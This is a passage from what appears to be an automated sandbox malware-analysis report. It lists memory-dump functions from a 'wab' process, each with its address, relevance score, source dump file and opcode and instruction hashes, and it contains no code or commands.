                                                          • Opcode Fuzzy Hash: ccf4e457ac1c0332379b9e698ae9b39d2661ae17e6f4c8dc5536654f8206ab11
                                                          • Instruction Fuzzy Hash: D4115E36B001258BCB159AB9DC14AAE77EAEBC8712F14453AD909E7344DF3A9D018BA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 28AFDB48 Relevance: .1, Instructions: 57COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e645fcb418b772edaedc85e68aa24d555046af66164f0737d9e3ba7c24d10bd5
                                                          • Instruction ID: 7d5cf4a108dca548ff4acfa76047d5fa3c4d47f0234ed29b5a608ef54de63dc3
                                                          • Opcode Fuzzy Hash: e645fcb418b772edaedc85e68aa24d555046af66164f0737d9e3ba7c24d10bd5
                                                          • Instruction Fuzzy Hash: A901D4707011145FC702EE3CD89471A7BD6EB8D710F508539E10ADB392DE2AED428790
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 28AF70C0 Relevance: .1, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 89a9ed0f7c3fe0a7ac5297dc461587073f45cc4e709bac4182bd5432cf9f29d7
                                                          • Instruction ID: 2d35ee832d5d6a9a4d9f896ed0efe2df4f6fecc6063ab7f4f1278698fb666af1
                                                          • Opcode Fuzzy Hash: 89a9ed0f7c3fe0a7ac5297dc461587073f45cc4e709bac4182bd5432cf9f29d7
                                                          • Instruction Fuzzy Hash: AB21E3B5D016599FDB00CF9AD880BCEFBB4FB49210F10822AE918A7340C3746554CBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 28AF73F7 Relevance: .1, Instructions: 54COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4a994c1ed59ebd64cbce7d26be4df7b5d4a30da9f174540b0859beb814bcfaf5
                                                          • Instruction ID: 5bcabf767660f3dfb2a393c1aa6e9400e25749906aaa0852cc8379c978b4c00d
                                                          • Opcode Fuzzy Hash: 4a994c1ed59ebd64cbce7d26be4df7b5d4a30da9f174540b0859beb814bcfaf5
                                                          • Instruction Fuzzy Hash: 3101B136B000699BDB15A6BDDC647EE77EBEBC8711F44013AD945E3244DE298C1287E1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02ECD10B Relevance: .1, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2626825826.0000000002ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02ECD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ecd000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3f4675e99f22990077d7ca64c846758c7cedafdaf71502d2a3914074f32ea8d3
                                                          • Instruction ID: 22760a0d2a9a90da673acc9e06157ca6e690e6e5f362e223e6cba859c808e03b
                                                          • Opcode Fuzzy Hash: 3f4675e99f22990077d7ca64c846758c7cedafdaf71502d2a3914074f32ea8d3
                                                          • Instruction Fuzzy Hash: 8C118E75544244DFCB15CF50DAC4B15BB61FB88318F24C6AED8494B756C33AD44ACB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EF14C8 Relevance: .1, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d8eff2b7a347ce611e8d29dc6fff21f07e0ff602633724ff173c45ecaa35cf5c
                                                          • Instruction ID: cef42461536673ba3148fdc4b82d39fd8944c8407a066c969b1880e7a0703a82
                                                          • Opcode Fuzzy Hash: d8eff2b7a347ce611e8d29dc6fff21f07e0ff602633724ff173c45ecaa35cf5c
                                                          • Instruction Fuzzy Hash: 8F018472A40219CFCFA1EFB9845029D77F6EB48254B11907AD509EB201E731C9418FD5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 28AF70C8 Relevance: .1, Instructions: 52COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d6da9bc427779dcfc4c047ef6bc6ef205d359dcc1516d72f0c3fc88373865ce3
                                                          • Instruction ID: 636c896ee85f6ab66017fc25f74da7e75eac2899d2447337d2f7175f25dc535a
                                                          • Opcode Fuzzy Hash: d6da9bc427779dcfc4c047ef6bc6ef205d359dcc1516d72f0c3fc88373865ce3
                                                          • Instruction Fuzzy Hash: 0911D0B5D01259AFDB00CF9AD884BCEFBB4FF49310F10812AE918A7340C374A954CBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 28AF7650 Relevance: .1, Instructions: 51COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 37b5cbf48df7c62b08cbb72fab8c2e7967c7e194bd3a755379a1b0a81b76eec4
                                                          • Instruction ID: e37eca96bb68fb61bf26ab1b5399d51933b71ad5ad11592016d03fb4dd39a26c
                                                          • Opcode Fuzzy Hash: 37b5cbf48df7c62b08cbb72fab8c2e7967c7e194bd3a755379a1b0a81b76eec4
                                                          • Instruction Fuzzy Hash: 2E01A9B17000104BD7449A7D8454B0BB7CAEBDC720F20883DF00EDB742DE6ADD0243A5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EF8048 Relevance: .0, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a73abf3086760303703ab3bbb003215fdc3e2467960ce1ea5589fe3d6905059b
                                                          • Instruction ID: 0f794d93bdaaba4c9880b8098b453480e202194eede589cdb06fba44b12c89c6
                                                          • Opcode Fuzzy Hash: a73abf3086760303703ab3bbb003215fdc3e2467960ce1ea5589fe3d6905059b
                                                          • Instruction Fuzzy Hash: 9F0162327003154FDB149A798868A2F7BEBAFC8B653518539DA05C7751FF31DC018665
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EF8040 Relevance: .0, Instructions: 48COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e82e0b71f1c8beb4c967a44a484a677eff7dfbac60ce2d87dfecd5963388f324
                                                          • Instruction ID: 1bfd78d478240180973b4505b272a430d350c0ab4ebc7f839ef1753038ec2d44
                                                          • Opcode Fuzzy Hash: e82e0b71f1c8beb4c967a44a484a677eff7dfbac60ce2d87dfecd5963388f324
                                                          • Instruction Fuzzy Hash: 43018436B003114FD7149F7985A8A3E6BEBAF847553558539D905C7611FF31C8018254
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 28AFDB58 Relevance: .0, Instructions: 46COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 33afb4b05e72fd754f0c8a10c765c7824c24fbeb31a1ce9be8b4832b86eb65b9
                                                          • Instruction ID: 39023c6351fb06e1cbf081c9e56b58387d2884817ea349e31d974c029a223365
                                                          • Opcode Fuzzy Hash: 33afb4b05e72fd754f0c8a10c765c7824c24fbeb31a1ce9be8b4832b86eb65b9
                                                          • Instruction Fuzzy Hash: 290169307011148BD702EE3DD89471A77D6EB8D720F508839E10ADB352DE3AED428794
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EFE290 Relevance: .0, Instructions: 43COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dd8141035859cf8134b47b3d236d11b7f9a4fc2d93bf8af8c4d05b0579fb9fb5
                                                          • Instruction ID: 88b1b0aa3ea6aef92a1d04a60b4fad26ef35bc14d76d8eeb207662d559c60563
                                                          • Opcode Fuzzy Hash: dd8141035859cf8134b47b3d236d11b7f9a4fc2d93bf8af8c4d05b0579fb9fb5
                                                          • Instruction Fuzzy Hash: 2A01C871B10224ABDB649E75E84079E77BAFB89314F508439EB05EB341EB76B904CBC4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EF7DC8 Relevance: .0, Instructions: 43COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 085510c340a9b72688236f29d3dc70066847a9f239632517a2ed33bfaf248f4a
                                                          • Instruction ID: 2cd2b7c3730762a98678bdbc2352b655f0ff56d0d04ad848dcaa6d2d76ee3cb3
                                                          • Opcode Fuzzy Hash: 085510c340a9b72688236f29d3dc70066847a9f239632517a2ed33bfaf248f4a
                                                          • Instruction Fuzzy Hash: 91F0AF3579810287EBE01D6584097B6A65DDB06699F54F47BA602CE180FF7ACCC0C66A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 28AFBB10 Relevance: .0, Instructions: 40COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3370ae8e6987d33b5789f2c1314bf532fbe0951a3c5c31da02a78188b8395909
                                                          • Instruction ID: 468aee004730f2d076cd586fbbf62418cd85c547443e5c900e30a3a047d8634d
                                                          • Opcode Fuzzy Hash: 3370ae8e6987d33b5789f2c1314bf532fbe0951a3c5c31da02a78188b8395909
                                                          • Instruction Fuzzy Hash: 89F0AF35607204CBCB149A56E981BA877B2FB64350F644476FA04D725ADA37DA07C750
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EF7FAF Relevance: .0, Instructions: 39COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a53cc07f66a9e7f9acde52adb24c29c15db405c494d15526afafa6aa4d949c9b
                                                          • Instruction ID: 50cdd06faf330e89ec199d3a3f93944964353c298ae530f531bec6805b858fdb
                                                          • Opcode Fuzzy Hash: a53cc07f66a9e7f9acde52adb24c29c15db405c494d15526afafa6aa4d949c9b
                                                          • Instruction Fuzzy Hash: 30F0C871F401109FEB90EB78890137EBBE26F44314F50D465DB05E7281E7758A51CB95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EFB488 Relevance: .0, Instructions: 34COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1a05f7df35d72e488f2fc8e772416ffa3135cad9ef7db1df39ddea484d18a4a8
                                                          • Instruction ID: 01a24ce7fb5687b1b19c4c2ba5d9c9d3790083aa1c3280a500e4168808c07d74
                                                          • Opcode Fuzzy Hash: 1a05f7df35d72e488f2fc8e772416ffa3135cad9ef7db1df39ddea484d18a4a8
                                                          • Instruction Fuzzy Hash: B7F0C435B00114CFD714EB68C5A8B6D77B2EF88716F5440A8E9069B3A0DB79AD42CB40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EFC0F0 Relevance: .0, Instructions: 33COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b47f3e4b8ed071bc2ae040cbaae37d3cf66b019c79f83980234d61b28bcb7a05
                                                          • Instruction ID: 4a8cc12d86357456129357677221203ed43e676982ccee7c6dff0e86e1ba26ea
                                                          • Opcode Fuzzy Hash: b47f3e4b8ed071bc2ae040cbaae37d3cf66b019c79f83980234d61b28bcb7a05
                                                          • Instruction Fuzzy Hash: F4F0FF70A00209AFDB05EBB8E99159D7BF6EF44300FD046A9C204AB251EF75AF549B91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EFAC2D Relevance: .0, Instructions: 30COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c008fe63d828f0259c94ebf75b5610440ef4cfb3b13774f544fd39b884094794
                                                          • Instruction ID: 3baa3f1c120f6c1b197e3ff0e150603e212b808291d616fa4d89e8b6275f111f
                                                          • Opcode Fuzzy Hash: c008fe63d828f0259c94ebf75b5610440ef4cfb3b13774f544fd39b884094794
                                                          • Instruction Fuzzy Hash: 6EF06D30780209CFE744DF64C458BEA37B1BF0830AF119468D22ADF380CBB98A808B91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EFAC36 Relevance: .0, Instructions: 30COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c008fe63d828f0259c94ebf75b5610440ef4cfb3b13774f544fd39b884094794
                                                          • Instruction ID: 3baa3f1c120f6c1b197e3ff0e150603e212b808291d616fa4d89e8b6275f111f
                                                          • Opcode Fuzzy Hash: c008fe63d828f0259c94ebf75b5610440ef4cfb3b13774f544fd39b884094794
                                                          • Instruction Fuzzy Hash: 6EF06D30780209CFE744DF64C458BEA37B1BF0830AF119468D22ADF380CBB98A808B91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 28AF98B1 Relevance: .0, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2cad4e59e67816bbc8700a66713f6b131cf70a645353e0807cdd97c663d0b4eb
                                                          • Instruction ID: ea4f89f17103f42636681bfde511a20d4263eeb0a2402ec631f7949d215593d6
                                                          • Opcode Fuzzy Hash: 2cad4e59e67816bbc8700a66713f6b131cf70a645353e0807cdd97c663d0b4eb
                                                          • Instruction Fuzzy Hash: 9BF06D71E06248AFDB10DAB08D857497BA9EB0A305F2548E6E408DB142EA37CA46D792
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EF14B8 Relevance: .0, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 78f02dc27203191d7cc18d95164c7d8167163fa76ec528cd486f3304c0a42966
                                                          • Instruction ID: a6e24978e62ff2b444b5a93d72560f75ab99d38469a28a2c1d9d8c045fe5daca
                                                          • Opcode Fuzzy Hash: 78f02dc27203191d7cc18d95164c7d8167163fa76ec528cd486f3304c0a42966
                                                          • Instruction Fuzzy Hash: 48D0A735A9026547EB70445454803763365C7C52A9F919065ED6FDEB51F705C8914241
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Function 02EF1A00 Relevance: 15.2, Strings: 12, Instructions: 193COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %$%$%$%$%$%$%$%$%$%$%$%
                                                          • API String ID: 0-1529166535
                                                          • Opcode ID: 68c3b9ab7d798149276e11867a150aabe3b0f2675a48ec4ad5f8d6e0a2e85aec
                                                          • Instruction ID: 4fe314f872fd93f46587080cabf52c517e6305e542a43dcc87ef5aa58689bee8
                                                          • Opcode Fuzzy Hash: 68c3b9ab7d798149276e11867a150aabe3b0f2675a48ec4ad5f8d6e0a2e85aec
                                                          • Instruction Fuzzy Hash: 3E51705284E7E99FE317577818B82C83F214F6728AF0A91D789948F0A3F459484DC3AB
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EF1A62 Relevance: 12.6, Strings: 10, Instructions: 141COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %$%$%$%$%$%$%$%$%$%
                                                          • API String ID: 0-4035151967
                                                          • Opcode ID: c1910929159f7e64586280ede5e4b3b04833b92991f583a9c5de7450f9fe3145
                                                          • Instruction ID: 20dcf85088a27b797edd99c3846480d576f0855e07a77e4d575502b0bfa58b95
                                                          • Opcode Fuzzy Hash: c1910929159f7e64586280ede5e4b3b04833b92991f583a9c5de7450f9fe3145
                                                          • Instruction Fuzzy Hash: 8341CC4284E7E59FE317573458B82C83F214F5328AF0A90DBC9888F0A3F819484DC3AB
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EF1A65 Relevance: 6.3, Strings: 5, Instructions: 63COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %$%$%$%$ p^
                                                          • API String ID: 0-2690488090
                                                          • Opcode ID: 9123ba8a60371d4e0c2db10ee4f1cc598724a1d91c19af09a4460130d149e25b
                                                          • Instruction ID: 020abf93675732fc35d8525e972ae55e6792ec786913be1b8384c2d16cd1705a
                                                          • Opcode Fuzzy Hash: 9123ba8a60371d4e0c2db10ee4f1cc598724a1d91c19af09a4460130d149e25b
                                                          • Instruction Fuzzy Hash: BD11374280E7E55FE713A7286CB92C57F614F5314AF0A80D788948F0A3E919484DC7AF
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%